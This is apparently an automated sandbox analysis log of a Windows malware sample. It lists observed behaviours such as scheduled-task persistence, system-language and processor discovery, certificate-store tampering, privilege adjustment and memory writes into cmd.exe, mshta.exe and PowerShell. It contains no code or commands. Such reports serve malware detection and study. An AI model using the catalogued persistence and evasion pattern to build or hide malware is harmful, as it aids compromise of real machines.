File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\sugkcx\gvnsf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\sugkcx\gvnsf.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2688 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe C:\Windows\SysWOW64\cmd.exe
PID 2688 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe C:\Windows\SysWOW64\cmd.exe
PID 2688 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe C:\Windows\SysWOW64\cmd.exe
PID 2688 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe C:\Windows\SysWOW64\cmd.exe
PID 2688 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe C:\Windows\SysWOW64\mshta.exe
PID 2688 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe C:\Windows\SysWOW64\mshta.exe
PID 2688 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe C:\Windows\SysWOW64\mshta.exe
PID 2688 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe C:\Windows\SysWOW64\mshta.exe
PID 2768 wrote to memory of 2928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2768 wrote to memory of 2928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2768 wrote to memory of 2928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2768 wrote to memory of 2928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2772 wrote to memory of 2924 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2924 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
